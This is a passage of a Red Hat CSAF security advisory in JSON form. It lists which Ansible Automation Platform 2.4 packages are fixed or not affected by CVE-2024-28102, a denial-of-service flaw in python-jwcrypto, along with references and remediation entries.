"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-28102",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-03-10T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268758"
}
],
"notes": [
{
"category": "description",
"text": "An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-jwcrypto: malicious JWE token can cause denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The CVE-2024-28102 vulnerability in JWCrypto represents a moderate severity issue due to its potential impact on system availability and resource consumption. While the vulnerability allows for a denial of service (DoS) attack, it requires an attacker to craft a malicious JWE Token with a high compression ratio. This specific condition limits the practical exploitability of the vulnerability to some extent, as it demands a more sophisticated attack approach than common vulnerabilities. Nonetheless, if exploited, the vulnerability can lead to significant memory exhaustion and increased server processing time, impacting the overall performance and availability of the affected system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-28102"
},
{
"category": "external",
"summary": "RHBZ#2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
}
],
"release_date": "2024-03-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-07-12T01:43:40+00:00",
"details": "Red Hat Ansible Automation Platform",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
